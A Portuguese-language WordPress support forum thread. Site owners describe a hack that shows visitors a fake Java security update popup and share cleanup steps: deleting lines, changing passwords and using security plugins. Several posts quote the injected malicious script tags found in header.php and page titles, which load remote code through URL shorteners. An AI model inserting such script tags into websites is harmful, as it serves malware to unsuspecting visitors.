Suporte » Outros assuntos » Atualização obrigatória de segurança do Java

Visualizando 11 respostas - 1 até 11 (de um total de 11)
  • No header.php uma linha de script assim:
    <script src=”http://ow.ly/Hmql30iJwa5?v=NEW-VERSION-2018-03″></script>

    Natan, estou com o mesmo problema.. Retirei esse script da minha header porém voltou… Como você arrumou?

    Eu usei o plugin ““Anti-Malware Security and Brute-Force Firewall”, mudei todas as senhas de FTP e Banco de dados, retirei o script do header.php e problema não voltou a acontecer.

    O script está reaparecendo no teu header.php?

    Reapareceu uma vez, vou tentar fazer esses passos que você fez. Valeu irmão, abraço!

    Alguém sabe a solução deste problema?

    meu site está com essa problema

    http://www.anexogeek.com

    Wesley, dentro do arquivo header.php deve ter um linha de código parecida com essa:
    <script src=”http://ow.ly/Hmql30iJwa5?v=NEW-VERSION-2018-03″></script>

    É só apagar ela e salvar o arquivo novamente.

    Ola natan, então, havia deletado a linha, mas era outro o http://is.gd , mas não resolveu, até que olhando as paginas no menu de paginas do painel do wordpress, havia no nome de uma pagina mesmo um script, com esse link. deletei e resolveu.

    Que bom que resolveu, mas parece que estão melhorando o esquema então…
    Até hoje não descobri como o código foi inserido no meu site, mas por via das dúvidas troquei as senhas de FTP, Banco de dados e administradores.

    Bom dia amigos. Obrigado pela ajuda… encontrei um script no título de 17 páginas.

    <script src=”https://is.gd/ob8vtI?v=v8.0″></script>

    Na página HOME onde aparecia o aviso de atualização o tinha esse script.

    Removi todos e nao apareceu mais o popup/virus

    Rafa

    (@rafacoprimo)

    Olá pessoal, vi que muitos tiveram o problema igual ou similar da atualização de segurança de java, então resolvi compartilhar a experiência que tive com outros amigos no site anexogeek.com, entraram no login do painel de controle do blog por um acesso com senha padrão ( a clássica “mudar123”), e de lá incluíram um comando para redirecionar para uma tal j.mahoney e outro is.gd, que o weslei compartilhou mais acima aqui nesse tópico.

    No nosso caso, no painel das páginas mesmo estava o dito cujo que redirecionava para a tal atualização de java falsa.

    As ferramentas que ajudaram muito foram o sucuri web check (https://sitecheck.sucuri.net/) que apontou um erro de segurança e o rescan pro (https://rescan.pro/) que também apontou falhas de segurança.

    Outro cara que ajudou muito foi o bitdefender free que apontou o script sendo carregado junto da página e já bloqueou ele, sem danificar o acesso a página.

    Rafa

    (@rafacoprimo)

    Esqueci de mencionar os 2 plugins de segurança do wordpress que ajudaram muito, o sucuri e o wordfence, além do Anti-Malware Security and Brute-Force Firewall que o natankm mencionou mais acima.

Visualizando 11 respostas - 1 até 11 (de um total de 11)
  • Você deve estar logado para responder a este tópico.